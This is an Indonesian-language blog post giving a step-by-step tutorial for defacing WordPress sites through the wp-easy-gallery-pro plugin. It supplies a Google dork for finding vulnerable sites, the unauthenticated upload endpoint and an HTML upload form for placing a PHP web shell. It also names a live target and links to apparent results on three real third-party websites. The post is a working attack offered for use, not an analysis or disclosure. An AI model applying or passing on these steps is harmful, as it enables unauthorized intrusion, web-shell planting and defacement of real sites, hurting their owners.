-

Saturday, 5 August 2017

Cara Deface Wp-Easy-Gallery-Pro With CSRF + Live Target

Selamat Siang gan hehehe ketemu lagi sama saya Admin yg paling kece& Tamvan wkwkkwkw :v
Oke Sekarang saya mau berbagi Tutorial Seperti Biasa Yaitu Wp-Easy-Gallery-Pro ya Walaupun ini termasuk POC Jadul apa salah Nya Kita Mengupas Lagi Lebih Dalam Biar Mendesah wkwkwk :v
Oke Langsung aja Agan Simak  ;)


Bahan :
-Dork      " /wp-content/plugins/wp-easy-gallery-pro/ "
-CSRF
-Kopi
-Internet
-Waktu
-Exploit    " /wp-content/plugins/wp-easy-gallery-pro/admin/php.php "
-Kesabaran <== ini nih Yg Paling Penting gan :v
-Live TARGET " http://tormoveis.com/ " <== Di mohon Jangan di rusak Gan

1.Masukkan Dorknya di Google .. Dork Bisa di Kembangin Lagi Ya Gan di Kasih Site,intext Dll Biar dapet yg masih Perawan :v

2.Setelah kira" Dapet Target yg Vuln Masukkan Exploit nya..

3.Apabila Vuln ada Tulisan {"error":"No files were uploaded."} Atau Blank... Apabila NotFound Dll Silahkan Next target aja Gan :v

4.Setelah Itu Agan Masukkan Target Beserta Exploit Tadi Ke dalam CSRF Nya Gan

CSRF:

<form enctype="multipart/form-data"
action="http://www.contohweb.com/wp-content/plugins/wp-easy-gallery-pro/admin/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

5.Setelah itu CSRF nya di simpan dengan Extensi .html

6.Buka CSRF tadi lalu UPLOAD Shell Agan Apabila ada Tulisan Bla Bla Success Itu tandanya Shell agan Sudah Terupload

7.Buka Letak shell agan Upload Tadi di " /wp-content/uploads/shellagan.php " dan Terserah agan Mau di apakan :v Dosa di tanggung Sendiri gan :p

Nih Hasil Saya Gan : http://tormoveis.com/wp-content/uploads/aku.jpg
                              http://www.madcityblues.tv/wp-content/uploads/Screenshot_25.png.jpg
                              http://maherserv.com/wp-content/uploads/Screenshot_25.png.jpg


Sekian Tutorial kali ini Samapai Bertemu Kembali di Lain Waktu Gan Bye ;)


Mohon di Berikan Sumber Kalau Mau COPAS Gan :D

Older Post Home

1 comments:

This comment has been removed by a blog administrator.

Post a Comment